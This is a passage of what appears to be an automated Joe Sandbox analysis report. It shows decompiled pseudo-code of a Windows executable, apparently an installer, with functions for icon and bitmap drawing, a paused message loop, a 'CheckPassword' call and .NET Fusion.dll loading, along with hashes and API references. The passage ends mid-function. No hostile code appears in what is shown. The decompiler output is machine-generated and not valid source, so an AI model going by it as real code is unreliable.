Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 8e8aa01fe8bd538d6c6ab7aab6bfb4d2f36d62a3c5c28930bbd5ce218dcf30d8
Instruction ID: 793fc79b513d20d73f9d230ac8d1e2c96994409d89e9c648594a581ec8cd73ac
Opcode Fuzzy Hash: 8e8aa01fe8bd538d6c6ab7aab6bfb4d2f36d62a3c5c28930bbd5ce218dcf30d8
Instruction Fuzzy Hash: 8B510770A001459BDB10EF7ADC816EA7BF9AF09304B15857BFA04E73A2D738D941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE4B Relevance: 10.7, APIs: 7, Instructions: 153
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041BE4B(signed int __ebx, void* __edi) {
				struct HINSTANCE__* _t118;
				signed int _t125;
				signed int _t127;
				long _t132;
				void* _t134;
				void* _t140;
				intOrPtr _t150;
				signed int _t154;
				void* _t158;
				BYTE* _t159;
				BYTE* _t162;
				signed int _t164;
				void* _t166;
				intOrPtr _t167;

				_t158 = __edi;
				_t127 = __ebx | 0xffffffff;
				 *(_t166 - 0x20) = 0;
				_t134 =  *((intOrPtr*)(_t166 - 0xc)) - 1;
				if(_t134 < 0) {
					L10:
					if(_t127 == 0xffffffff) {
						_t127 = 0;
					}
					 *((intOrPtr*)(_t166 - 0x44)) =  *((intOrPtr*)(_t166 - 0x10)) + (_t127 + _t127) * 8;
					 *((intOrPtr*)(_t166 - 0x30)) = E004069BC( *((intOrPtr*)( *((intOrPtr*)(_t166 - 0x44)) + 8)),  *((intOrPtr*)(_t166 - 0x10)), _t158, 0);
					 *[fs:eax] = _t167;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))) + 8))( *[fs:eax], 0x41c000, _t166);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 - 4))))))();
					E0041BBA0( *((intOrPtr*)(_t166 - 0x30)),  *((intOrPtr*)(_t166 - 0x30)), _t166 - 0x3c, _t166 - 0x38,  *((intOrPtr*)( *((intOrPtr*)(_t166 - 4)))), 0);
					GetObjectA( *(_t166 - 0x3c), 0x18, _t166 - 0x74);
					GetObjectA( *(_t166 - 0x38), 0x18, _t166 - 0x5c);
					_t132 =  *(_t166 - 0x68) *  *(_t166 - 0x6c) * ( *(_t166 - 0x64) & 0x0000ffff);
					 *(_t166 - 0x40) =  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff);
					 *((intOrPtr*)(_t166 - 0x18)) =  *(_t166 - 0x40) + _t132;
					 *(_t166 - 0x34) = E004069BC( *((intOrPtr*)(_t166 - 0x18)),  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff) >> 0x20, _t158, 0);
					_push(_t166);
					_push(0x41bfdd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t167;
					_t159 =  *(_t166 - 0x34);
					_t162 =  &(( *(_t166 - 0x34))[_t132]);
					GetBitmapBits( *(_t166 - 0x3c), _t132, _t159);
					GetBitmapBits( *(_t166 - 0x38),  *(_t166 - 0x40), _t162);
					DeleteObject( *(_t166 - 0x38));
					DeleteObject( *(_t166 - 0x3c));
					_t118 =  *0x49a014; // 0x400000
					 *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) = CreateIcon(_t118,  *(_t166 - 0x28),  *(_t166 - 0x24),  *(_t166 - 0x4c),  *(_t166 - 0x4a), _t159, _t162);
					if( *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) == 0) {
						E0041B37C();
					}
					_pop(_t150);
					 *[fs:eax] = _t150;
					_push(E0041BFE4);
					return E00402660( *(_t166 - 0x34));
				} else {
					_t140 = _t134 + 1;
					_t125 = 0;
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
						_t164 =  *(_t166 - 0x1a) & 0x0000ffff;
						if(_t154 == _t164) {
							break;
						}
						__eflags = _t127 - 0xffffffff;
						if(_t127 != 0xffffffff) {
							__eflags = _t154 -  *(_t166 - 0x20);
							if(_t154 >  *(_t166 - 0x20)) {
								_t127 = _t125;
							}
						} else {
							__eflags = _t164 - _t154;
							if(_t164 >= _t154) {
								_t127 = _t125;
								 *(_t166 - 0x20) =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
							}
						}
						_t125 = _t125 + 1;
						_t140 = _t140 - 1;
						__eflags = _t140;
						if(__eflags != 0) {
							continue;
						} else {
							goto L10;
						}
					}
					_t127 = _t125;
					goto L10;
				}
			}

0x0041be4b
0x0041be4b
0x0041be50
0x0041be56
0x0041be59
0x0041be9d
0x0041bea0
0x0041bea2
0x0041bea2
0x0041beae
0x0041bebc
0x0041beca
0x0041bee4
0x0041bef7
0x0041bf01
0x0041bf10
0x0041bf1f
0x0041bf2f
0x0041bf3e
0x0041bf46
0x0041bf51
0x0041bf56
0x0041bf57
0x0041bf5c
0x0041bf5f
0x0041bf62
0x0041bf68
0x0041bf70
0x0041bf7e
0x0041bf87
0x0041bf90
0x0041bfa7
0x0041bfb5
0x0041bfbd
0x0041bfbf
0x0041bfbf
0x0041bfc6
0x0041bfc9
0x0041bfcc
0x0041bfdc
0x0041be5b
0x0041be5b
0x0041be5c
0x0041be5e
0x0041be65
0x0041be6a
0x0041be70
0x00000000
0x00000000
0x0041be76
0x0041be79
0x0041be92
0x0041be95
0x0041be97
0x0041be97
0x0041be7b
0x0041be7b
0x0041be7d
0x0041be7f
0x0041be8d
0x0041be8d
0x0041be7d
0x0041be99
0x0041be9a
0x0041be9a
0x0041be9b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041be9b
0x0041be72
0x00000000
0x0041be72

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BF10
GetObjectA.GDI32(?,00000018,?), ref: 0041BF1F
GetBitmapBits.GDI32(?,?,?), ref: 0041BF70
GetBitmapBits.GDI32(?,?,?), ref: 0041BF7E
DeleteObject.GDI32(?), ref: 0041BF87
DeleteObject.GDI32(?), ref: 0041BF90
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFAD

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: 3c3dd4c2968d3148edaca717f274c319af849b13cfc7544b624ece9a1a4d390b
Instruction ID: 4bbd2eff117aa994e69ddbf41dbe459af7dc9631145296d56e4e893510d56d43
Opcode Fuzzy Hash: 3c3dd4c2968d3148edaca717f274c319af849b13cfc7544b624ece9a1a4d390b
Instruction Fuzzy Hash: 33510575E00219AFCB14DFA9C8819EEB7F9EF48314B11842AF914E7391D738AD81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041CEC0 Relevance: 10.7, APIs: 7, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0041CEC0(void* __eax, void* __ebx, int* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v13;
				char _v14;
				signed char _t57;
				char _t58;
				intOrPtr _t64;
				struct HDC__* _t72;
				void* _t74;
				void* _t81;
				struct HDC__* _t93;
				void* _t106;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t127;
				int* _t129;
				void* _t131;
				void* _t132;
				intOrPtr _t133;

				_t107 = __ecx;
				_t131 = _t132;
				_t133 = _t132 + 0xfffffff4;
				_t129 = __ecx;
				_v8 = __edx;
				_t106 = __eax;
				if(E0041D124(__eax) == 0) {
					SetStretchBltMode(E0041B07C(_v8), 3);
				}
				if( *((intOrPtr*)(_t106 + 0x14)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 0xc)) == 0) {
					_push(0x26);
					_t57 = E0041B07C(_v8);
					_push(_t57);
					L00405C44();
					if((_t57 & 0x00000020) == 0 ||  *((char*)( *((intOrPtr*)(_t106 + 0x10)) + 0x25)) != 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 8)) == 0 || E0040CC24( *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x10)) + 8))) == 0) {
						goto L9;
					} else {
						_t58 = 0;
					}
				} else {
					L9:
					_t58 = 1;
				}
				_v13 = _t58;
				_t127 =  *((intOrPtr*)(_t106 + 0x10));
				_t122 =  *0x41d05c; // 0xf
				E0041B150(_v8, _t107, _t122, _t127);
				E0041D240(_t106);
				_v12 = 0;
				_v14 = 0;
				_t64 =  *((intOrPtr*)(_t127 + 0x10));
				if(_t64 != 0) {
					_push(1);
					_push(_t64);
					_t93 =  *(_v8 + 4);
					_push(_t93);
					L00405D0C();
					_v12 = _t93;
					_push( *(_v8 + 4));
					L00405CCC();
					_v14 = 1;
				}
				_push(_t131);
				_push(0x41d04d);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t133;
				if(_v13 == 0) {
					StretchDIBits( *(_v8 + 4),  *_t129, _t129[1], _t129[2] -  *_t129, _t129[3] - _t129[1], 0, 0,  *(_t127 + 0x14),  *(_t127 + 0x18),  *(_t127 + 0x20),  *(_t127 + 0x1c), 0,  *(_v8 + 0x20));
				} else {
					_t74 = E0041D0B8(_t106, 0, _t122);
					_t125 =  *0x41d05c; // 0xf
					E0041B150(_t74, 0, _t125, _t127);
					_t81 = E0041D0B8(_t106, 0, _t125);
					StretchBlt(E0041B07C(_v8),  *_t129, _t129[1], _t129[2] -  *_t129, _t129[3] - _t129[1],  *(_t81 + 4), 0, 0,  *(_t127 + 0x14),  *(_t127 + 0x18),  *(_v8 + 0x20));
				}
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(0x41d054);
				if(_v14 != 0) {
					_push(1);
					_push(_v12);
					_t72 =  *(_v8 + 4);
					_push(_t72);
					L00405D0C();
					return _t72;
				}
				return 0;
			}

0x0041cec0
0x0041cec1
0x0041cec3
0x0041cec9
0x0041cecb
0x0041cece
0x0041ced9
0x0041cee6
0x0041cee6
0x0041ceef
0x0041cefa
0x0041ceff
0x0041cf04
0x0041cf05
0x0041cf0d
0x00000000
0x0041cf30
0x0041cf30
0x0041cf30
0x0041cf34
0x0041cf34
0x0041cf34
0x0041cf34
0x0041cf36
0x0041cf39
0x0041cf3c
0x0041cf45
0x0041cf4c
0x0041cf53
0x0041cf56
0x0041cf5a
0x0041cf5f
0x0041cf61
0x0041cf63
0x0041cf67
0x0041cf6a
0x0041cf6b
0x0041cf70
0x0041cf79
0x0041cf7a
0x0041cf7f
0x0041cf7f
0x0041cf85
0x0041cf86
0x0041cf8b
0x0041cf8e
0x0041cf95
0x0041d022
0x0041cf97
0x0041cf99
0x0041cf9e
0x0041cfa4
0x0041cfbe
0x0041cfe4
0x0041cfe4
0x0041d029
0x0041d02c
0x0041d02f
0x0041d038
0x0041d03a
0x0041d03f
0x0041d043
0x0041d046
0x0041d047
0x00000000
0x0041d047
0x0041d04c

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEE6
740BAD70.GDI32(00000000,00000026), ref: 0041CF05
740BB410.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF6B
740BB150.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF7A
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFE4
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D022
740BB410.GDI32(?,?,00000001,0041D054,00000000,00000026), ref: 0041D047

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Stretch$B410$B150BitsMode
String ID:
API String ID: 1142175050-0
Opcode ID: e86badb8244d5df9a4800637c34f6a1895a7e90cda7e1ea6b6d5024958a3a1d4
Instruction ID: a387d2c4f9a4bc91fd4f0e5b83bec92a14bd02f800b4ec19f0925a60e6c40561
Opcode Fuzzy Hash: e86badb8244d5df9a4800637c34f6a1895a7e90cda7e1ea6b6d5024958a3a1d4
Instruction Fuzzy Hash: 1C512CB4600200AFDB14DFA8C985F9BBBE8AF08304F10859AB545D7292C778ED81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00456120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00456120(int __eax, void* __ebx, long __ecx, char __edx, void* __edi, void* __esi, char* _a4) {
				char _v5;
				char _v6;
				char _v12;
				intOrPtr _v16;
				struct tagMSG _v44;
				char _v48;
				struct HWND__* _t31;
				intOrPtr _t33;
				intOrPtr _t42;
				void* _t46;
				char _t47;
				intOrPtr _t51;
				char* _t61;
				intOrPtr _t68;
				intOrPtr _t73;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v48 = 0;
				_v12 = 0;
				_t78 = __ecx;
				_v5 = __edx;
				_t76 = __eax;
				_t61 = _a4;
				_push(_t80);
				_push(0x45628a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_v6 = 0;
				 *_t61 = 0;
				if( *0x49afac == 0) {
					L10:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(0x456291);
					E00403400( &_v48);
					return E00403400( &_v12);
				} else {
					 *0x49afc0 = 0;
					_t31 =  *0x49afb8; // 0x0
					if(SendMessageA(_t31, __eax, 0, __ecx) == 0) {
						goto L10;
					} else {
						_v6 = 1;
						_t33 =  *0x49a628; // 0x2262410
						E00424264(_t33,  &_v12);
						_v16 = E0041EE8C(0, _t61, _t76, _t78);
						_push(_t80);
						_push(0x456238);
						_push( *[fs:eax]);
						 *[fs:eax] = _t82;
						E00403494( &_v48, "[Paused] ");
						E0040357C( &_v48, _v12);
						_t42 =  *0x49a628; // 0x2262410
						E004242AC(_t42, _v48, _t76);
						while( *0x49afc0 == 0) {
							_t46 = GetMessageA( &_v44, 0, 0, 0) - 0xffffffff;
							if(_t46 != 0) {
								if(_t46 == 1) {
									PostQuitMessage(_v44.wParam);
								} else {
									TranslateMessage( &_v44);
									DispatchMessageA( &_v44);
									continue;
								}
							}
							break;
						}
						_t47 =  *0x49afc1; // 0x0
						 *_t61 = _t47;
						_pop(_t73);
						 *[fs:eax] = _t73;
						_push(0x45623f);
						E0041EF40(_v16);
						_t51 =  *0x49a628; // 0x2262410
						return E004242AC(_t51, _v12, _t76);
					}
				}
			}

0x00456121
0x00456123
0x00456126
0x00456127
0x00456128
0x0045612b
0x0045612e
0x00456131
0x00456133
0x00456136
0x00456138
0x0045613d
0x0045613e
0x00456143
0x00456146
0x00456149
0x0045614d
0x00456157
0x0045626c
0x0045626e
0x00456271
0x00456274
0x0045627c
0x00456289
0x0045615d
0x0045615d
0x0045616c
0x00456179
0x00000000
0x0045617f
0x0045617f
0x00456186
0x0045618b
0x00456197
0x0045619c
0x0045619d
0x004561a2
0x004561a5
0x004561b0
0x004561bb
0x004561c3
0x004561c8
0x00456205
0x004561de
0x004561e1
0x004561e4
0x004561ec
0x004561e6
0x004561f7
0x00456200
0x00000000
0x00456200
0x004561e4
0x00000000
0x004561e1
0x0045620e
0x00456213
0x00456217
0x0045621a
0x0045621d
0x00456225
0x0045622d
0x00456237
0x00456237
0x00456179

APIs

SendMessageA.USER32 ref: 00456172

Part of subcall function 00424264: GetWindowTextA.USER32 ref: 00424284

Part of subcall function 0041EE8C: GetCurrentThreadId.KERNEL32 ref: 0041EEDB
Part of subcall function 0041EE8C: 740BAC10.USER32(00000000,0041EE3C,00000000,00000000,0041EEF8,?,00000000,0041EF2F,?,0042EB08,?,00000001), ref: 0041EEE1

Part of subcall function 004242AC: SetWindowTextA.USER32(?,00000000), ref: 004242C4

GetMessageA.USER32 ref: 004561D9
TranslateMessage.USER32(?), ref: 004561F7
DispatchMessageA.USER32 ref: 00456200

Strings

[Paused] , xrefs: 004561A8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$TextWindow$CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 3744435275-4230553315
Opcode ID: c32f2484c236114710a119cba632d86995ad1a2beb13d17df1f49aa5f6d2ee22
Instruction ID: d2a3ade33fa5ad802753642a4a37e14ea1d0ee6c33f40ad92aa307aa024c524b
Opcode Fuzzy Hash: c32f2484c236114710a119cba632d86995ad1a2beb13d17df1f49aa5f6d2ee22
Instruction Fuzzy Hash: A531D9319042449ED701EBBADC41BDE7BB8EB49314F9540B7F840E3292D77C9919CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046A284 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0046A284(void* __ebx, void* __ecx, void* __edi, struct HICON__* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				struct HICON__* _t56;
				intOrPtr _t68;
				void* _t73;
				intOrPtr _t81;
				void* _t91;
				void* _t101;

				_t101 = __fp0;
				_t88 = __esi;
				_t87 = __edi;
				_push(__esi);
				_push(__edi);
				_v8 = 0;
				_push(_t91);
				_push(0x46a3c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffff4;
				_t73 = 0;
				E00414AD0( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)),  &_v8, __eflags);
				if(( *0x49b29b & 0x00000004) != 0) {
					_t73 = E0047771C(_v8);
				}
				if(_t73 == 0) {
					_t96 =  *0x49b3b8;
					if( *0x49b3b8 != 0) {
						_v16 = _v8;
						_v12 = 0xb;
						_t68 =  *0x49b3b8; // 0x22901cc
						_t73 = E00492FBC(_t68,  &_v16, "CheckPassword", _t96, _t101, _t73, 0, 0);
					}
				}
				if(_t73 == 0) {
					_t40 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t40 + 0x37));
					if( *((char*)(_t40 + 0x37)) != 0) {
						_t56 = GetCursor();
						_t88 = _t56;
						SetCursor(LoadCursorA(0, 0x7f02));
						Sleep(0x2ee);
						SetCursor(_t56);
					}
					_t41 =  *0x49ad7c; // 0x227d908
					E0047D0CC(_t41, _t73, 2, 0, _t87, _t88, 1, 1, 0);
					_t44 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t44 + 0x37));
					if( *((char*)(_t44 + 0x37)) != 0) {
						__eflags = 0;
						E00414B00( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)), _t73, 0, _t87, _t88);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)))) + 0x78))();
					}
				} else {
					 *0x49b374 = 0;
					if(( *0x49b29e & 0x00000020) != 0) {
						E00403450(E0046C0CC() + 0x138, _t73, _v8, _t87, _t88);
					}
					E00414B00( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)), _t73, 0, _t87, _t88);
				}
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(0x46a3ca);
				return E00403400( &_v8);
			}

0x0046a284
0x0046a284
0x0046a284
0x0046a28b
0x0046a28c
0x0046a28f
0x0046a294
0x0046a295
0x0046a29a
0x0046a29d
0x0046a2a0
0x0046a2b1
0x0046a2bd
0x0046a2c7
0x0046a2c7
0x0046a2cb
0x0046a2cd
0x0046a2d4
0x0046a2de
0x0046a2e1
0x0046a2ed
0x0046a2f7
0x0046a2f7
0x0046a2d4
0x0046a2fb
0x0046a337
0x0046a33a
0x0046a33e
0x0046a340
0x0046a345
0x0046a354
0x0046a35e
0x0046a364
0x0046a364
0x0046a373
0x0046a378
0x0046a380
0x0046a383
0x0046a387
0x0046a395
0x0046a397
0x0046a3aa
0x0046a3aa
0x0046a2fd
0x0046a2fd
0x0046a30b
0x0046a31a
0x0046a31a
0x0046a32d
0x0046a32d
0x0046a3af
0x0046a3b2
0x0046a3b5
0x0046a3c2

APIs

GetCursor.USER32(00000000,0046A3C3), ref: 0046A340
LoadCursorA.USER32 ref: 0046A34E
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A3C3), ref: 0046A354
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A3C3), ref: 0046A35E
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A3C3), ref: 0046A364

Strings

CheckPassword, xrefs: 0046A2E8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: cd4c96ec3ae05625ef5929548b0b7ebfe072ecd950439fc3717b6cc25dbfd687
Instruction ID: 048ef2ac727e4c19906b5fd58d75d7b3626c495d90e6ed791287928044b9bac7
Opcode Fuzzy Hash: cd4c96ec3ae05625ef5929548b0b7ebfe072ecd950439fc3717b6cc25dbfd687
Instruction Fuzzy Hash: 9731B574640604DFD700EB65D98AB9E7BE0EF44304F1480B6BD04AB3A2D778AE50CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00458B20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00458B20(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t24;
				signed int _t60;
				char _t66;
				intOrPtr _t73;
				void* _t77;
				struct HINSTANCE__* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t78 = __esi;
				_t66 = __edx;
				_t60 = __ecx;
				_t82 = _t83;
				_t84 = _t83 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				if(__edx != 0) {
					_t84 = _t84 + 0xfffffff0;
					_t24 = E00402D30(_t24, _t82);
				}
				_t59 = _t60;
				_v5 = _t66;
				_t77 = _t24;
				_push(_t82);
				_push(0x458c23);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00402B30(0);
				E004587F4(_t60, _t60,  &_v20, 3, _t77, _t78);
				E0042C3E4(_v20,  &_v16);
				E004035C0( &_v12, "Fusion.dll", _v16);
				E0040352C( &_v16, E00403738(_v12));
				_t79 = E0042E294(_v16, _t59, 0x8000);
				 *(_t77 + 4) = _t79;
				if(_t79 == 0) {
					_v28 = _v12;
					_v24 = 0xb;
					E004078D4("Failed to load .NET Framework DLL \"%s\"", 0,  &_v28,  &_v16);
					E004526A4(_v16, _t59, _t77, _t79, 0);
				}
				_t20 = _t77 + 4; // 0x626d6573
				_t80 = GetProcAddress( *_t20, "CreateAssemblyCache");
				_t88 = _t80;
				if(_t80 == 0) {
					E004526A4("Failed to get address of .NET Framework CreateAssemblyCache function", _t59, _t77, _t80, _t88);
				}
				_t21 = _t77 + 8; // 0x4586f4
				 *_t80(_t21, 0);
				_t89 =  *((intOrPtr*)(_t77 + 8));
				if( *((intOrPtr*)(_t77 + 8)) == 0) {
					E004526A4(".NET Framework CreateAssemblyCache function failed", _t59, _t77, _t80, _t89);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00458C2A);
				return E00403420( &_v20, 3);
			}

0x00458b20
0x00458b20
0x00458b20
0x00458b21
0x00458b23
0x00458b26
0x00458b27
0x00458b2b
0x00458b2e
0x00458b31
0x00458b36
0x00458b38
0x00458b3b
0x00458b3b
0x00458b40
0x00458b42
0x00458b45
0x00458b49
0x00458b4a
0x00458b4f
0x00458b52
0x00458b59
0x00458b65
0x00458b70
0x00458b80
0x00458b92
0x00458ba4
0x00458ba6
0x00458bab
0x00458bb4
0x00458bb7
0x00458bc5
0x00458bcd
0x00458bcd
0x00458bd7
0x00458be0
0x00458be2
0x00458be4
0x00458beb
0x00458beb
0x00458bf2
0x00458bf6
0x00458bf8
0x00458bfc
0x00458c03
0x00458c03
0x00458c0a
0x00458c0d
0x00458c10
0x00458c22

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458BDB

Strings

.NET Framework CreateAssemblyCache function failed, xrefs: 00458BFE
Failed to load .NET Framework DLL "%s", xrefs: 00458BC0
Fusion.dll, xrefs: 00458B7B
CreateAssemblyCache, xrefs: 00458BD2
Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458BE6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: 244dc61e75036d6c3b0192238eb8083e59cf00f34e40042f08a2e9a4851f9aee
Instruction ID: 1c489dae8163ac769eb4a4ecd270df04bca0dde1928883b4ca469517540c11a6
Opcode Fuzzy Hash: 244dc61e75036d6c3b0192238eb8083e59cf00f34e40042f08a2e9a4851f9aee
Instruction Fuzzy Hash: A0316471E00609ABCB01EFA5C88169EB7A8AF45315F50857FE814B7382DF789909C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C130 Relevance: 10.6, APIs: 7, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041C130(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				struct HDC__* _t23;
				intOrPtr _t31;
				struct HDC__* _t34;
				struct tagBITMAPINFO* _t37;
				intOrPtr _t44;
				void* _t46;
				struct HBITMAP__* _t48;
				void* _t51;

				_t37 = __ecx;
				_t46 = __edx;
				_t48 = __eax;
				E0041C030(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = GetFocus();
				_t23 = _v16;
				_push(_t23);
				L00405F14();
				_v20 = _t23;
				_push(_t51);
				_push(0x41c1db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				if(_t46 != 0) {
					_push(0);
					_push(_t46);
					_t34 = _v20;
					_push(_t34);
					L00405D0C();
